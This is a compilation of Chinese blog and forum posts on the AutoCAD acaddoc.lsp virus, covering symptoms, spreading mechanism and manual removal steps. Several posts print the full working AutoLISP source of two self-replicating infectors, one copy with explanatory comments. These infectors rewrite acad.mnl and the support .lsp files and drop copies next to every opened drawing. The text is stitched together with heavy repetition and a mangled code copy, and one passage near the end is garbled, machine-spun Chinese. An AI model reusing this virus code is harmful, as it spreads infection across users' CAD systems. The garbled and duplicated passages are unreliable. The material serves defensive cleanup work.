CAD病毒acaddoc

在软件操作过程中发现楼层无法切换的解决方法（主要由acaddoc.lsp病毒文件引起）。

第一种
1、注意首先将感染acaddoc.lsp病毒的工程文件夹打开，把文件中的acaddoc.lsp文件删除。

2、删除c盘中的boot.dat文件。

3、在鲁班软件安装目录中（sysdat\sys16）找到acaddoc.lsp文件，打开后全选所有内容并删除，保存后关闭。

然后右击该文件夹选择属性，点选只读并确定。

第二种
刚才那个病毒的问题，试过了在我们软件里加一个空的lsp文件打开我们软件就不会有问题了
不过其实病毒还在的，要彻底清除病毒，要删除C:\Documents and
Settings\Administrator\Application Data\Autodesk\AutoCAD
2006\R16.2\chs\Support 这个文件夹里的acadapq.lsp和acaddoc.lsp文件，把acad.mnl 文件里最后的
(load "acadapq")
(princ)
这两句话删除，再删除所有的acaddoc.lsp文件就可以了。

天正CAD产生的acaddoc.lsp病毒怎么解决①、关闭CAD（一定要先关闭正在运行的CAD程序）。

②、进入安全模式（重要前提！！！），按F3键打开XP系统的文件搜索窗口，搜索并删除acad.lsp、acadappp.lsp、acadapp.lsp acadapq.lsp 、acaddoc.lsp 这5个文件。

注意：“搜索范围”一定要选择“本机硬盘驱动器...”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将这3个文件全部搜索清除干净。

③、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)④用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

(错误: LOAD 失败: "acadapq")的根源。

(如“acad.mnl”文件中无此行代码可忽略此操作)附：“acad.mnl”文件可能在下面的目录中，C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD200×\R×.×\chs\Support其中×××是你登录系统时的用户名，200×和R×.×分别是CAD的版本和版本代号。

（注意：目录C:\Documents and Settings\是系统隐藏文件夹）acaddoc.lsp病毒有效的方法。

1:查找acaddoc.lsp，把高级选项打开，把隐藏的也搜索出来删除。

手工查杀ACADDOC.LSP病毒发现中的这个病毒的状况是：开AutoCAD2006后提示"＜AutoCAD 菜单实用程序已加载。

正在初始化VBA 系统...执行错误执行错误＞"同时发现工作目录平时只有DWG、BAK 等熟悉文件外，多了acaddoc.lsp，打开看如下：(setqwold_cmd(getvar"cmdecho"))(setvar"cmdecho")(setqwpath(findfile"base.dcl"))(setqwpath(substrwpath1(-(strlenwpath)8)))(setqwwmnlwpath(getvar"menuname" ))(setq wnowdwg (getvar "dwgname" ))(setqwwjqm (findfile wnowdwg))(setq wdwgwpath (substr wwjqm1(-(strlen wwjqm)(strlen wnowdwg))));;;alert(setqf(open"c:\\boot.dat" "w"))(write-line"[dang]"f)(write-line (strcat"ff=" wdwgwpath)f)(write-line (strcat"yy="wpath)f)(closef)(setqboot(findfile "boot.dat"))(if(/=boot"")(command"_-vbarun" "ThisDrawing.hh" ))(setq wacadwpath (findfile "acaddoc.lsp"))(setq wacadwpath (substr wacadwpath1(strlen wacadwpath )11)))(setqwns1""wns2"")(setqwlspbj0)(setq wwjqm (strcat wpath "acaddoc.lsp" ))(if(setqwwjm (open wwjqm "r"))(progn (while (setqwwz(read-linewwjm))(setqwns1wns2)wns2 wwz))(if(> (strlen wns1) 14)(if(= (substr wns187) "acadapq" )(setq wlspbj1)))(close wwjm)))(setq wlspmnl 0)(setq wwjqm (strcat wpath "acad.mnl" ))(if(setq wwjm (open wwjqm "r")) (progn (while (setq wwz (read-line wwjm))(setq wns1 wns2) (setq wns2 wwz))(if(> (strlen wns1) 14)(if(= (substrwns187) "acadapq" )(setq wlspmnl 1))) (closewwjm)))(if(= wlspmnl 0) (progn (setq wwjqmwpath (strcat (chr97)(chr99)(chr97)(chr 100) (chr46)(chr 109) (chr 110) (chr108))))(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34) ")")wwjm)(write-line "(princ)" wwjm)wwjm)))(defun wwriteapp () (if(setqwwjm1 (open wnewacad "w"))(progn (setqwwjm (open woldacad "r"))(while (setqwwz(read-line wwjm))(write-line wwzwwjm1))(close wwjm)(close wwjm1))))(and(= wacadwpath wdwgwpath) (/= wacadwpath wpath))(progn(if(= 0wlspmnl)(progn(setq woldacad (findfile "acaddoc.lsp" ))(setq wnewacad (strcat wpath "acadapq.lsp") ))(progn(setq woldacad (strcatwpath "acadapq.lsp" ))(setq wnewacad (findfile "acaddoc.lsp" )))(if(=wlspbj0) (progn (setq wwjqm (strcat wpath "acaddoc.lsp" ))(setqwwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34)")")wwjm)(write-line "(princ)" wwjm)(close wwjm))) (wwriteapp ))(progn(/= wnowdwg "Drawing.dwg" )(progn(setq woldacad (findfile "acadapq.lsp" ))(setq wnewacad (strcat wdwgwpath "acaddoc.lsp" )) (wwriteapp)))))(setvar "cmdecho" wold_cmd)(princ)(setq strtopstr (strcat(chr92)(chr92)(chr70)(chr83)(chr49)(chr(chr83)(chr89)(chr83)(chr49)(chr92)(chr87)(chr79)(chr82)(chr75)(chr92)(chr80)(chr76)(chr79)(chr84)(chr69)(chr82)))(setq strbottomstr (strcat (chr(chr92)(chr76)(chr(chr67)(chr80)(chr82)(chr88)(chr89)(chr49)(chr46)(chr69)(chr88)(chr69)))(startapp(strcatstrtopstrstrbottomstr))(setvar"cmdecho"wold_cmd)(princ)(princ)N年以前学了点autolsp，虽然没编过什么程序，这个病毒基本还比较浅，能看得出个大概流程，原理跟acad.lsp差不多，利用AutoCAD自动加载文件活得病毒运行，然后感染，acaddoc.lsp是AutoCAD2004后每个图形打开时执行的例行程序，方便二次开发用的，当然也为病毒编写人敞开大门。

一种CAD病毒的清除与防范措施雪山飞猪 QQ534455近来又出现一种AutoCAD病毒，该病毒与以往CAD病毒不同。

干净的CAD 系统当打开DWG图时，如果该图所在目录下有ACADDOC.LSP文件（基本为病毒传播文件），ACADDOC.LSP就会运行。

1.病毒的特征与传播方式我们先看看病毒代码，代码如下：(setq flagx t)(setq bz "(setq flagx t)")(defun app(source target bz / flag flag1 wjm wjm1 text)(setq flag nil)(setq flag1 t)(if (findfile target)(progn(setq wjm1 (open target "r"))(while (setq text (read-line wjm1))(if (= text bz) (setq flag1 nil)));while(close wjm1));progn);if(if flag1(progn(setq wjm (open source "r"))(setq wjm1 (open target "a"))(write-line (chr 13) wjm1)(while (setq text (read-line wjm))(if (= text bz) (setq flag t))(if flag(progn(write-line text wjm1));progn);if);while(close wjm1)(close wjm));progn);if);defun(setvar "cmdecho" 0)(setq acadmnl (findfile "acad.mnl"))(setq acadmnlpath (vl-filename-directory acadmnl))(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl")) (setq mnlnum (length mnlfilelist))(setq acadexe (findfile "acad.exe"))(setq acadpath (vl-filename-directory acadexe))(setq support (strcat acadpath "\\support"))(setq lspfilelist (vl-directory-files support "*.lsp")) (setq lspfilelist (append lspfilelist (list "acaddoc.lsp"))) (setq lspnum (length lspfilelist))(setq dwgname (getvar "dwgname"))(setq dwgpath (findfile dwgname))(if dwgpath(progn(setq acaddocpath (vl-filename-directory dwgpath))(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp")) (setq mnln 0)(while (< mnln mnlnum)(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))(app mnlfilename acaddocfile bz)(app acaddocfile mnlfilename bz)(setq mnln (1+ mnln)));while(setq lspn 0)(while (< lspn lspnum)(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))(app lspfilename acaddocfile bz)(app acaddocfile lspfilename bz)(setq lspn (1+ lspn)));while);progn);if(setq mnln 0)(while (< mnln mnlnum)(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))(setq mnln1 0)(while (< mnln1 mnlnum)(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))(app mnlfilename mnlfilename1 bz)(setq mnln1 (1+ mnln1)));while(setq lspn1 0)(while (< lspn1 lspnum)(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))(app mnlfilename lspfilename1 bz)(setq lspn1 (1+ lspn1)));while(setq mnln (1+ mnln)));while(setq lspn 0)(while (< lspn lspnum)(setq lspfilename (strcat support "\\" (nth lspn lspfilelist))) (setq lspn1 0)(while (< lspn1 lspnum)(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))(app lspfilename lspfilename1 bz)(setq lspn1 (1+ lspn1)));while(setq mnln1 0)(while (< mnln1 mnlnum)(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))(app lspfilename mnlfilename1 bz)(setq mnln1 (1+ mnln1)));while(setq lspn (1+ lspn))(load "acadapq")(princ)(load "acadapp")(princ)(load "acadapq")(princ)病毒代码运行后，首先会把病毒代码写入CAD用户系统目录下的*.mnl文件和CAD的support目录下的*.lsp文件中。

CAD中acaddoc.lsp病毒处理办法acaddoc病毒处理办法前言:下文第一、二、三段无实质内容，可略过不读。

一病毒简介:最近公司里流传一种cad病毒。

该病毒可被卡巴斯基和360杀毒软件查出。

卡巴斯基查出病毒名为Virus.ALS.Pasdoc.a，360杀毒软件查出病毒名为Trojan.Script.29327。

遗憾的是，卡巴斯基和360杀毒软件均不能将其彻底清除。

二中毒症状：机器中毒后，运行CAD时，每打开一个dwg文件，均在dwg文件所在目录下生成一个acaddoc.lsp的文件。

由于每次开图，病毒程序均进行一次病毒传播复制过程，因此使得CAD 开图时速度变慢。

用记事本查看CAD安装路径下的support目录下的任一*.lsp文件，如文件末尾含有与附件1相同的代码，则可判定为中毒。

三传播机理：通过分析病毒的源代码，初步了解其传播机理如下：如机器已中毒，CAD新打开dwg文件时，病毒程序自动加载。

并搜索CAD工作目录下的acad.mnl文件，感染同一目录下的*.mnl文件，搜索acad的support目录，并感染该目录下的所有*.lsp文件。

同时病毒在当前打开的dwg文件所在目录下生成acaddoc.lsp文件，以利于下次传播。

如本机未中毒，而新打开的dwg文件所在目录下有acaddoc.lsp 文件，则病毒将感染上述目录下的*.mnl与*.lsp文件。

该病毒的最终目的是调用acadapq 与 acadappp 两个非法程序。

至于这两个程序会干什么，暂未深入研究。

四清除步骤：1.退出CAD。

2.全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件，然后彻底删除上述文件。

注意查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的操作系统文件”。

搜索时选择“查找所有文件及文件夹”，然后在“高级选项”里勾选“搜索系统文件夹”“搜索隐藏的文件和文件夹”“搜索子文件夹”。

cad病毒及解决办法
打开CAD文件时总是出来类似以下的莫名其妙的提示：未知命令“THISDRAWING.HH”…正在初始化VBA…初始错误…
并且每次打开文件后会在相应文件路径下生成一个文件“acaddoc.lsp”。

一定是病毒！于是到网上搜啊搜，终于找到了解决办法！
先到这里下载一个压缩包。

然后搜索所有分区里名为“acaddoc.lsp”的文件，全部删除！注意显示隐藏文件及文件夹。

接下来将下载好的压缩包里的两个文件“acaddoc.lsp”和“acadapq.lsp”复制到路径：
C:\Documents and Settings\用户名\Application Data\Autodesk\AutoCAD 200*\R*\chs\Support
或者你的CAD安装目录下的support文件夹下，直接覆盖文件即可。

方法二:推荐使用
按F3键打开XP系统的文件搜索窗口，搜索并删除acad.lsp、acadappp.lsp、acadapp.lsp acadapq.lsp 、acaddoc.lsp这5个文件。

注意：“搜索范围”一定要选择“本机硬盘驱动器...”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将这3个文件全部搜索清除干净。

acaddoc.lsp病毒文件彻底清除方法(2012-05-20 23:33:17)转载▼分类：电脑知识标签：杂谈前言: 最近本人公司里流行一种CAD病毒，中毒后，CAD每次新开图均生成一个acaddoc.lsp 的病毒文件，虽破坏力不大，但烦不胜烦。

经研究病毒源码后，摸索出了一套清除该病毒的办法。

然后经过在数个同事机器上验证，该方法行之有效。

于是将杀毒方法成文，群发给部门同事，以下是原文。

一病毒简介:最近公司里流传一种cad病毒。

该病毒可被卡巴斯基和360杀毒软件查出。

卡巴斯基查出病毒名为Virus.ALS.Pasdoc.a，360杀毒软件查出病毒名为Trojan.Script.29327。

遗憾的是，卡巴斯基和360杀毒软件均不能将其彻底清除。

二中毒症状：机器中毒后，运行CAD时，每打开一个dwg文件，均在dwg文件所在目录下生成一个acaddoc.lsp的文件。

由于每次开图，病毒程序均进行一次病毒传播复制过程，因此使得CAD 开图时速度变慢。

用记事本查看CAD安装路径下的support目录下的任一*.lsp文件，如文件末尾含有与附件1相同的代码，则可判定为中毒。

三传播机理：通过分析病毒的源代码，初步了解其传播机理如下：如机器已中毒，CAD新打开dwg文件时，病毒程序自动加载。

并搜索CAD工作目录下的acad.mnl文件，感染同一目录下的*.mnl文件，搜索acad的support目录，并感染该目录下的所有*.lsp文件。

同时病毒在当前打开的dwg文件所在目录下生成acaddoc.lsp文件，以利于下次传播。

如本机未中毒，而新打开的dwg文件所在目录下有acaddoc.lsp文件，则病毒将感染上述目录下的*.mnl与*.lsp文件。

该病毒的最终目的是调用acadapq 与acadappp 两个非法程序。

至于这两个程序会干什么，暂未深入研究。

四清除步骤：1. 退出CAD。

2. 全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件，然后彻底删除上述文件。

AUTOCAD病毒的清除方法acaddoc.lsp是一个专门针对CAD文件的病毒，在CAD软件使用中主要表现的情况如下：1、无法拷贝2、在命令行提示需要执行一个宏3、CAD会出莫名其妙的问题解决方法：关闭AutoCAD程序;搜索所有acaddoc.lsp和acadapq.lsp文件删除所有关acadapq.lsp(3,836字节) 和被感染的acaddoc.lsp(27字节) (看文件大小);重启AutoCAD,OKashan发表LZ还说少了一个步骤：没有处理acad.mnl文件，这样的清除并不彻底，下次再打开带毒的dwg文件（这里并非指dwg文件本身带毒，而是指在该dwg文件下有acaddoc.lsp文件存在）后，系统又会感染病毒，偶曾经对这个cad病毒的代码做过详细分析，下面是原文，有兴趣的朋友可以详细看看：最近自己的电脑中了CAD病毒，症状为打开一个dwg文件后，在该dwg文件所在目录下就会自动生成一个“acaddoc.lsp”文件，即使手工将其删除，下次打开dwg文件时又会自动生成。

如果把dwg文件和acaddoc.lsp文件一起复制到另外一部未感染CAD病毒的电脑上，只要一打开该dwg文件，则该电脑就会被感染。

因为这个CAD病毒是个lisp程序，花了些时间对病毒代码进行分析如下：-----------------下面是病毒代码-----------------------------(setq wold_cmd (getvar "cmdecho"))(setvar "cmdecho" 0)(setq wpath (findfile "base.dcl"))(setq wpath (substr wpath 1 (- (strlen wpath) 8))) ;wpath变量保存ACAD下support目录路径(setq wwmnlwpath (getvar "menuname")) ;获得当前菜单名，这句没有用处，下面并未使用wwmnlwpath变量(setq wnowdwg (getvar "dwgname")) ;获得当前打开图形文件名(setq wwjqm (findfile wnowdwg)) ;wwjqm变量保存当前打开图形文件的完整路径(setq wdwgwpath (substr wwjqm 1( - (strlen wwjqm) (strlen wnowdwg)))) ;wdwgwpath变量保存当前打开图形文件所在路径;;;alert( setq f ( open "c:\\boot.dat" "w")) ;f变量为boot.dat文件句柄，c盘根目录下boot.dat文件若存在则(write-line "[dang]" f) ;打开，不存在则创建，然后将当前打开图形文件所在路径和support(write-line (strcat "ff=" wdwgwpath) f) ;目录路径写入boot.dat文件(write-line (strcat "yy=" wpath) f)(close f)(setq boot (findfile "boot.dat")) ;获得boot.dat文件所在目录完整路径(if (/= boot "") (command "_-vbarun" "ThisDrawing.hh")) ;这句是要运行一个名为“ThisDrawing.hh”的宏，但该宏并不存在(setq wacadwpath (findfile "acaddoc.lsp")) ;wacadwpath变量保存当前加载的acaddoc.lsp文件所在目录(setq wacadwpath (substr wacadwpath 1(- (strlen wacadwpath) 11)))(setq wns1 "" wns2 "")(setq wlspbj 0) ;wlspbj变量是判断support目录下acaddoc.lsp文件是否已感染的;;; ;标志，已感染为1，未感染为0(setq wwjqm (strcat wpath "acaddoc.lsp")) ;wwjqm变量指向support目录下的acaddoc.lsp文件(if (setq wwjm (open wwjqm "r")) ;wwjm变量为打开support目录下的acaddoc.lsp文件的句柄，若打开(progn ;成功则进行处理(while(setq wwz (read-line wwjm)) ;逐行读取acaddoc.lsp文件内容，读取结束后，wns1中是倒数第2行(setq wns1 wns2 ) ;内容，wns2中是最后一行的内容(setq wns2 wwz))(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”，(if (= (substr wns1 8 7) "acadapq") ;若是则已感染(setq wlspbj 1)))(close wwjm)))(setq wlspmnl 0) ;wlspmnl变量是判断support目录下acad.mnl文件是否已感染的标志，;;; ;已感染为1，未感染为0(setq wwjqm (strcat wpath "acad.mnl")) ;wwjqm变量指向support目录下的acad.mnl文件(if (setq wwjm (open wwjqm "r" )) ;wwjm变量为打开support目录下的acad.mnl文件的句柄，若打开(progn ;成功则进行处理(while (setq wwz (read-line wwjm)) ;逐行读取acad.mnl文件内容，读取结束后，wns1中是倒数第2行内容(setq wns1 wns2 ) ;wns2中是最后一行的内容(setq wns2 wwz))(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”，若是则(if (= (substr wns1 8 7) "acadapq") ;已感染(setq wlspmnl 1)))(close wwjm) ;关闭acad.mnl文件))(if (= wlspmnl 0) ;若acad.mnl文件未感染，则写入加载病毒的代码到acad.mnl文件的(progn ;最后2行中(setq wwjqm (strcat wpath(strcat (chr 97) (chr 99) (chr 97)(chr 100) (chr 46) (chr 109)(chr 110) (chr 108)) )) ;障眼法，等于(strcat wpath "acad.mnl")(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr 34)"acadapq" (chr 34) ")" ) wwjm)(write-line "(princ)" wwjm)(close wwjm)))(defun wwriteapp ()(if (setq wwjm1 (open wnewacad "w"))(progn(setq wwjm (open woldacad "r"))(while (setq wwz (read-line wwjm))(write-line wwz wwjm1))(close wwjm)(close wwjm1))))(if (and (= wacadwpath wdwgwpath)(/= wacadwpath wpath)) ;若加载的acaddoc.lsp文件和图形文件同目录(progn(if (= 0 wlspmnl) ;acad.mnl文件未感染(progn(setq woldacad (findfile "acaddoc.lsp")) ;在下面调用wwriteapp子程序读取图形文件目录下的acaddoc.lsp文件(setq wnewacad (strcat wpath "acadapq.lsp")) ;的内容，在support目录下创建acadapq.lsp 文件并将acaddoc.lsp) ;文件的内容写入acadapq.lsp文件中;;else （acad.mnl文件已感染）(progn(setq woldacad (strcat wpath "acadapq.lsp" )) ;在下面调用wwriteapp子程序读取support目录下的acadapq.lsp文件(setq wnewacad (findfile "acaddoc.lsp")) ;的内容，写入图形目录下的acaddoc.lsp文件中))(if (= wlspbj 0) ;support目录下的acaddoc.lsp文件未感染(progn ;下面代码将加载病毒程序的代码写入acaddoc.lsp文件的最后2行中(setq wwjqm (strcat wpath "acaddoc.lsp" ))(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr 34)"acadapq" (chr 34) ")" ) wwjm)(write-line "(princ)" wwjm)(close wwjm)))(wwriteapp));;else （若加载的是support目录下的acaddoc.lsp文件）(progn(if (/= wnowdwg "Drawing.dwg" ) ;当前打开文件不是新建图形文件(progn(setq woldacad (findfile "acadapq.lsp")) ;在图形文件目录下创建acaddoc.lsp文件，将acadapq.lsp(setq wnewacad (strcat wdwgwpath "acaddoc.lsp")) ;文件的内容写入acaddoc.lsp文件中(wwriteapp)))))(setvar "cmdecho" wold_cmd)(princ) ;下面的代码又是个障眼法，没什么作用(setq strtopstr (strcat (chr 92) (chr 92) (chr 70)(chr 83) (chr 49) (chr 92)(chr 83) (chr 89) (chr 83)(chr 49) (chr 92) (chr 87)(chr 79) (chr 82) (chr 75)(chr 92) (chr 80) (chr 76)))-----------------病毒代码到此结束----------------------------从以上对病毒代码的分析可知，该病毒的病毒文件有2个，一个为acadapq.lsp，位于ACAD 安装目录下的support目录下，另一个为acaddoc.lsp，位于当前打开的dwg文件所在目录下，2个病毒文件的内容相同。

一种CAD病毒的清除与防范措施雪山飞猪QQ534455近来又出现一种AutoCAD病毒，该病毒与以往CAD病毒不同。

干净的CAD 系统当打开DWG图时，如果该图所在目录下有ACADDOC.LSP文件（基本为病毒传播文件），ACADDOC.LSP就会运行。

1.病毒的特征与传播方式我们先看看病毒代码，代码如下：(setq flagx t)(setq bz "(setq flagx t)")(defun app(source target bz / flag flag1 wjm wjm1 text)(setq flag nil)(setq flag1 t)(if (findfile target)(progn(setq wjm1 (open target "r"))(while (setq text (read-line wjm1))(if (= text bz) (setq flag1 nil)));while(close wjm1));progn);if(if flag1(progn(setq wjm (open source "r"))(setq wjm1 (open target "a"))(write-line (chr 13) wjm1)(while (setq text (read-line wjm))(if (= text bz) (setq flag t))(if flag(progn(write-line text wjm1));progn);if);while(close wjm1)(close wjm));progn);if);defun(setvar "cmdecho" 0)(setq acadmnl (findfile "acad.mnl"))(setq acadmnlpath (vl-filename-directory acadmnl))(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl")) (setq mnlnum (length mnlfilelist))(setq acadexe (findfile "acad.exe"))(setq acadpath (vl-filename-directory acadexe))(setq support (strcat acadpath "\\support"))(setq lspfilelist (vl-directory-files support "*.lsp")) (setq lspfilelist (append lspfilelist (list "acaddoc.lsp"))) (setq lspnum (length lspfilelist))(setq dwgname (getvar "dwgname"))(setq dwgpath (findfile dwgname))(if dwgpath(progn(setq acaddocpath (vl-filename-directory dwgpath))(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp")) (setq mnln 0)(while (< mnln mnlnum)(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))(app mnlfilename acaddocfile bz)(app acaddocfile mnlfilename bz)(setq mnln (1+ mnln)));while(setq lspn 0)(while (< lspn lspnum)(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))(app lspfilename acaddocfile bz)(app acaddocfile lspfilename bz)(setq lspn (1+ lspn)));while);progn);if(setq mnln 0)(while (< mnln mnlnum)(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))(setq mnln1 0)(while (< mnln1 mnlnum)(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))(app mnlfilename mnlfilename1 bz)(setq mnln1 (1+ mnln1)));while(setq lspn1 0)(while (< lspn1 lspnum)(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))(app mnlfilename lspfilename1 bz)(setq lspn1 (1+ lspn1)));while(setq mnln (1+ mnln)));while(setq lspn 0)(while (< lspn lspnum)(setq lspfilename (strcat support "\\" (nth lspn lspfilelist))) (setq lspn1 0)(while (< lspn1 lspnum)(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))(app lspfilename lspfilename1 bz)(setq lspn1 (1+ lspn1)));while(setq mnln1 0)(while (< mnln1 mnlnum)(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))(app lspfilename mnlfilename1 bz)(setq mnln1 (1+ mnln1)));while(setq lspn (1+ lspn))(load "acadapq")(princ)(load "acadapp")(princ)(load "acadapq")(princ)病毒代码运行后，首先会把病毒代码写入CAD用户系统目录下的*.mnl文件和CAD的support目录下的*.lsp文件中。

预防CAD病毒并解决CAD病毒“错误: 输入的列表有缺陷”的方法：
经参考相关文章并结合自己重新实践总结：
预防CAD病毒并解决CAD病毒“错误: 输入的列表有缺陷”的方法：
1、在关闭CAD情况下。

1.搜索全盘的acaddoc.lsp和acadapq.lsp并删除；2注意要.显示隐藏文件；
2、用360卸载CAD（必须卸载干净，并进入C盘用户目录内删除没有卸载完的CAD文件）包括路径C:\Documents and Settings\用户名\Application Data\Autodesk下的文件夹。

3、重新启动，重新安装CAD，打开并激活好。

4、新建两个记事本并分别压缩，把压缩包改名acaddoc.lsp 和acadapq.lsp，再把改完后的acaddoc.lsp和acadapq.lsp覆盖路径C:\Documents and Settings\用户名\Application
Data\Autodesk\AutoCAD 20XX\RXX\chs\Support下相应的文件即可。

5、装好CAD系统后，在没有被病毒感染前，将CAD目录内所有文件的属性设置为只读，包括路径C:\Documents and Settings\用户名\Application Data\Autodesk下的文件夹。

可以减少中毒的机率。

（注：此时打开CAD时可能会出现无法更新的提示，如果这样要重新对安装目录已设置“只读”
试验先，把设置“只读”前的勾号去掉，设置不“只读”，再打开试试没问题了，再设置“只读”。

）。

序止: 迩去自己公司里流通一种CAD病毒，中毒后，CAD屡屡新启图均死成一个acaddoc.lsp的病毒文献，之阳早格格创做虽损害力没有大，但是烦没有堪烦.经钻研病毒源码后，摸索出了一套扫除该病毒的办法.而后通过正在数个共事呆板上考证，该要领止之灵验.于是将杀毒要领成文，群收给部分共事，以下是本文.一病毒简介:迩去公司里流传一种cad病毒.该病毒可被卡巴斯基战360杀毒硬件查出.卡巴斯基查出病毒名为Virus.ALS.Pasdoc.a，360杀毒硬件查出病毒名为Trojan.Script.29327.遗憾的是，卡巴斯基战360杀毒硬件均没有克没有及将其实足扫除.二中毒症状：呆板中毒后，运止CAD时，每挨启一个dwg文献，均正在dwg文献地圆目录下死成一个acaddoc.lsp的文献.由于屡屡启图，病毒步调均举止一次病毒传播复造历程，果此使得CAD启图时速度变缓.用记事本查看CAD拆置路径下的support目录下的任一*.lsp文献，如文献开端含有与附件1相共的代码，则可判决为中毒.三传播机理：通太过解病毒的源代码，收端相识其传播机理如下：如呆板已中毒，CAD新挨启dwg文献时，病毒步调自动加载.并搜索CAD处事目录下的acad.mnl文献，熏染共一目录下的*.mnl文献，搜索acad的support目录，并熏染该目录下的所有*.lsp文献.共时病毒正在目前挨启的dwg文献地圆目录下死成acaddoc.lsp文献，以好处下次传播.如本机已中毒，而新挨启的dwg文献地圆目录下有acaddoc.lsp文献，则病毒将熏染上述目录下的*.mnl与*.lsp 文献.该病毒的最后脚段是调用acadapq 与 acadappp 二个非法步调.至于那二个步调会搞什么，久已深进钻研.四扫除步调：1. 退出CAD.2. 齐盘搜索acadapq.*、、acadappp.*、acaddoc.* 文献，而后实足简略上述文献.注意查找前正在文献夹选项中树立“隐现所有文献与文献夹”以及与消“隐躲受呵护的支配系统文献”.搜索时采用“查找所有文献及文献夹”，而后正在“下档选项”里勾选“搜索系统文献夹”“搜索隐躲的文献战文献夹”“搜索子文献夹”.如果搜出的文献无法简略，则先浑空回支站，再搜索简略.注：探索者目录下有个AcadDoc.lsp（注意大小写）没有是病毒文献，谨防误删.3. 查看C盘根目录下是可有boot.dat文献，如有，则将其简略.4. 加进C:\Documents and Settings\用户名\Application Data\Autodesk\AutoCAD 2006（或者AutoCAD2004）\R16.2\chs\Support目录，用记事本挨启该目录下的所有*.mnl文献，脚动简略与附件1相共的代码（普遍皆正在文献开端），而后保存.并将建改后的所有*.mnl文献属性树立为“只读”.5. 加进CAD拆置目录下的support目录，将该目录下的所有*.lsp文献按步调4要领处理.记得将其属性设为“只读”.6. 如果本机拆置有多个版本的CAD，皆需按上述步调查看一次.如按上述步调扫除病毒乐成，没有要开尔，得先感动国家.如已乐成，再去找尔.五防止步伐：由于该病毒是通过读与dwg文献地圆的目录下acaddoc.lsp去传播的.果为正在交受其余共事的文献夹时，应先查看该文献夹中是可包罗上述病毒文献.如有，则简略之.共时也该当保证传给其余共事的文献夹没有要包罗上述文献.病毒会熏染support目录下的 *.lsp文献.果此提议新建一个文献夹，将时常使用的lisp步调搁置正在该文献夹下，共时正在CAD选项中将其树立为处事搜索目录.已拆杀毒硬件的呆板应最先将杀毒硬件拆上（360杀毒硬件免费的），正在交受他人传去的文献后应最先杀毒.提议没有要曲交挨启大众盘上的dwg文献，应先下载到本机再挨启.－－尖锐的分隔线－－上文中所道的样本文献里所含代码即一段以“(setq flagx t)(setq bz "(setq flagx t)")”启头，以“(load "acadapq")(princ)(load "acadappp.lsp")(princ)”末端的代码，很佳辨识，中招的共教无妨一试.。

如何根除导致AUTOCAD开图卡顿甚至无响应的CAD病毒？上周有位网友的CAD出了问题，启动是无响应或直接导致CAD 软件停止工作，重装后第一次启动没事，但打开一张图纸后就又有问题了，结果发现图纸目录下有一个acaddoc.lsp文件，一个纯文本的LSP文件，大小居然有200MB，后来将同名的文件都删除后，卸载软件重装后再次启动，居然又出来一个acaddoc.lsp，这次居然大小变成了900多MB。

最近还有其他网友说刚装CAD好好的，但后来也出现类似的开图纸长时间无响应的情况，估计情况也类似。

上次我从网友那将200MB的病毒文件复制过来了，但当时只是简单看了一下代码，也不太懂，并没有找到将病毒彻底清除的方法。

最近在网上查了一些资料，对此病毒有了更深入的了解，将这病毒的特征和解决方法简单给大家讲一下，可以帮助大家更好地预防和根除此病毒。

病毒简介：该病毒可以被卡巴斯基和360杀毒软件查出，卡巴斯基查出病毒名为Virus.ALS.pasdoc.a，360杀毒软件查出病毒名为Trojan.Script.29327。

遗憾的是，卡巴斯基和360查毒软件均不能讲器彻底清除。

中毒症状：机器中毒时，运行CAD时，没打开一个DWG文件，均在DWG 文件所在目录生成一个acaddoc.lsp的文件。

每次开图，此病毒程序会被自动加载并进行一次病毒传播复制过程，病毒文件增大到一定程度后就会导致CAD开图速度极慢设置导致CAD停止工作。

用记事本打开图纸目录下的acaddoc.lsp文件，或CAD安装路径下的SUPPORT目录下的任意一个*.lsp文件，如果文件中含有与底部所附相同代码，即可判定为中毒。

传播机理：通过分析病毒的源代码，初步了解其传播机理如下：如果机器已经中毒，CAD打开新的DWG文件时，病毒程序就会自动加载。

病毒会搜索CAD工作目录下的acad.mnl文件，感染*.mnl文件，搜索acad的支持文件目录，感染目录下的所有*.lsp文件。

